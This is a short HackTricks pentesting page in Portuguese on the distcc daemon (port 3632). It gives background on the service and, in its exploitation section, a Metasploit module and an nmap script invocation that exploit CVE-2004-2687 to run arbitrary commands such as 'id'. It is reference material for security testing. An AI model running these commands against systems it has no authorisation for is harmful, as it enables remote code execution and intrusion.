hacktricks/src/network-services-pentesting/3632-pentesting-distcc.md

31 lines
1.2 KiB
Markdown

{{#include ../banners/hacktricks-training.md}}
# Informações Básicas
**Distcc** é uma ferramenta que melhora o **processo de compilação** ao utilizar o **poder de processamento ocioso** de outros computadores na rede. Quando **distcc** é configurado em uma máquina, essa máquina é capaz de distribuir suas **tarefas de compilação** para outro sistema. Este sistema receptor deve estar executando o **daemon distccd** e deve ter um **compilador compatível** instalado para processar o código enviado.
**Porta padrão:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
# Exploração
Verifique se é vulnerável a **CVE-2004-2687** para executar código arbitrário:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
_Eu não acho que o shodan detecta este serviço._
# Resources
- [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec)
- [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Post criado por **Álex B (@r1p)**
{{#include ../banners/hacktricks-training.md}}